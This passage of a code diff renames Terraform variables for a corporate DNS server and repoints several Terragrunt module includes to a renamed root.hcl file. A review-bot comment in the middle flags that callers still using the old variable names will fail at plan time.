- description = "image of the dnsserver host"
+ description = "image of the corpdns-server host"
 }
-variable "dnsserver_flavor" {
+variable "corpdns_flavor" {
 type = string
- description = "flavor of the dnsserver host"
+ description = "flavor of the corpdns-server host"
 default = "d2-8"
 }
-variable "dnsserver_userdata" {
+variable "corpdns_userdata" {
 type = string
- description = "Userdata for the dnsserver virtual machine"
+ description = "Userdata for the corpdns-server virtual machine"
 default = null
 }
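Review bot: `corpdns_image` keeps no `default`, so after this rename any caller that still supplies the old `dnsserver_image` name fails at plan time with a missing-variable error, since undeclared inputs are silently ignored by Terraform. The terragrunt/bootstrap/terragrunt.hcl `inputs` block is not in this diff beyond its `include` line, so confirm it (and any tfvars or CI pipeline) was switched to `corpdns_image`, `corpdns_flavor` and `corpdns_userdata`. Moving `ext_dnsserver_userdata_file` into the top `locals` block in main.tf is consistent with the renamed variables.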
diff --git a/terragrunt/bootstrap/terragrunt.hcl b/terragrunt/bootstrap/terragrunt.hcl
index 7af7c4f0..7b1ab876 100644
--- a/terragrunt/bootstrap/terragrunt.hcl
+++ b/terragrunt/bootstrap/terragrunt.hcl
@@ -19,5 +19,5 @@ inputs = {
 include {
- path = find_in_parent_folders()
+ path = find_in_parent_folders("root.hcl")
 }
diff --git a/terragrunt/client/terragrunt.hcl b/terragrunt/client/terragrunt.hcl
index 9ecd877e..2c576e89 100644
--- a/terragrunt/client/terragrunt.hcl
+++ b/terragrunt/client/terragrunt.hcl
@@ -15,5 +15,5 @@ inputs = {
 include {
- path = find_in_parent_folders()
+ path = find_in_parent_folders("root.hcl")
 }
diff --git a/terragrunt/docker/terragrunt.hcl b/terragrunt/docker/terragrunt.hcl
index bf55d24c..d025da65 100644
--- a/terragrunt/docker/terragrunt.hcl
+++ b/terragrunt/docker/terragrunt.hcl
@@ -14,5 +14,5 @@ inputs = {
 include {
- path = find_in_parent_folders()
+ path = find_in_parent_folders("root.hcl")
 }
diff --git a/terragrunt/lanturtle/terragrunt.hcl b/terragrunt/lanturtle/terragrunt.hcl
index afa70140..929fee9a 100644
--- a/terragrunt/lanturtle/terragrunt.hcl
+++ b/terragrunt/lanturtle/terragrunt.hcl
@@ -16,5 +16,5 @@ inputs = {
 include {
- path = find_in_parent_folders()
+ path = find_in_parent_folders("root.hcl")
 }
diff --git a/terragrunt/logging/terragrunt.hcl b/terragrunt/logging/terragrunt.hcl
index 8adf9bbb..99bf672b 100644
--- a/terragrunt/logging/terragrunt.hcl
+++ b/terragrunt/logging/terragrunt.hcl
@@ -16,5 +16,5 @@ inputs = {
 include {
- path = find_in_parent_folders()
+ path = find_in_parent_folders("root.hcl")
 }
diff --git a/terragrunt/repository/terragrunt.hcl b/terragrunt/repository/terragrunt.hcl
index 4d21fd3d..de0905c6 100644
--- a/terragrunt/repository/terragrunt.hcl
+++ b/terragrunt/repository/terragrunt.hcl
@@ -14,5 +14,5 @@ inputs = {
 include {
- path = find_in_parent_folders()
+ path = find_in_parent_folders("root.hcl")
 }
diff --git a/terragrunt/terragrunt.hcl b/terragrunt/root.hcl
similarity index 100%
rename from terragrunt/terragrunt.hcl
rename to terragrunt/root.hcl
diff --git a/terragrunt/videoserver/terragrunt.hcl b/terragrunt/videoserver/terragrunt.hcl
index a951bfd8..f35392a9 100644
--- a/terragrunt/videoserver/terragrunt.hcl
+++ b/terragrunt/videoserver/terragrunt.hcl
@@ -16,5 +16,5 @@ inputs = {
 include {
- path = find_in_parent_folders()
+ path = find_in_parent_folders("root.hcl")
 }
diff --git a/terragrunt/wazuh/terragrunt.hcl b/terragrunt/wazuh/terragrunt.hcl
index 999c5ef7..8fcd1234 100644
--- a/terragrunt/wazuh/terragrunt.hcl
+++ b/terragrunt/wazuh/terragrunt.hcl
@@ -14,5 +14,5 @@ inputs = {
 include {
- path = find_in_parent_folders()
+ path = find_in_parent_folders("root.hcl")
 }